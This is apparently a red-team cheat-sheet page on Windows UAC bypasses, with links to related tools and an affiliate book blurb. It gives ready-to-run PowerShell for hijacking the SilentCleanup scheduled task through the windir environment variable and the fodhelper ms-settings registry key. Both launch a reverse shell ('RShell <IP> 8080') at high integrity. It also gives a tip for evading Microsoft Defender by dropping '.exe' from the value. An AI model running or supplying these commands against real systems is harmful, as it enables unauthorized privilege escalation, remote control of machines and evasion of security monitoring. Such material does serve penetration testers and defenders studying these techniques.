User Access Control (UAC)

User Account control (UAC)

Exploring Windows UAC Bypasses: Techniques and Detection Strategies — Elastic Security LabsElastic Security Labs

Bypass 1: DiskCleanup Scheduled Task Hijack

Exploiting Environment Variables in Scheduled Tasks for UAC Bypasswww.tiraniddo.dev

SilentCleanup is a scheduled task which is configured on Windows by default. It may be started from a process with a medium integrity level, and then automatically elevates to a high integrity level since the "Run with highest privileges" option is enabled.

It starts the program "%windir%\system32\cleanmgr.exe" with some arguments.

Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd.exe /K C:\Windows\Tasks\RShell.exe <IP> 8080 & REM " -Force
Start-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup" -TaskName "SilentCleanup"

Cleanup

Clear-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Force

Bypass 2: FodHelper Execution Hijack

Windows10: Neue UAC-Bypassing-Methode (fodhelper.exe)Borns IT- und Windows-Blog

The difference between signature-based and behavioural detections | S3cur3Th1sSh1ts3cur3th1ssh1t.github.io

Microsoft Defender Antivirus is only triggered when it senses ".exe" in the value being set, so if you simply remove the ".exe" you will not get blocked. RShell.exe => RShell

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Windows\Tasks\RShell <IP> 8080" -Force

C:\Windows\System32\fodhelper.exe

Cleanup

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

SSPI Datagram Contexts

GitHub - antonioCoco/SspiUacBypass: Bypassing UAC with SSPI Datagram ContextsGitHub

WinPwnage

GitHub - rootm0s/WinPwnage: UAC bypass, Elevate, Persistence methodsGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Evading EDR: The Definitive Guide to Defeating Endpoint Detection Systems The author uses his years of experience as a red team operator to investigate each of the most common sensor components, discussing their purpose, explaining their implementation, and showing the ways they collect various data points from the Microsoft operating system. In addition to covering the theory behind designing an effective EDR, each chapter also reveals documented evasion strategies for bypassing EDRs that red teamers can use in their engagements.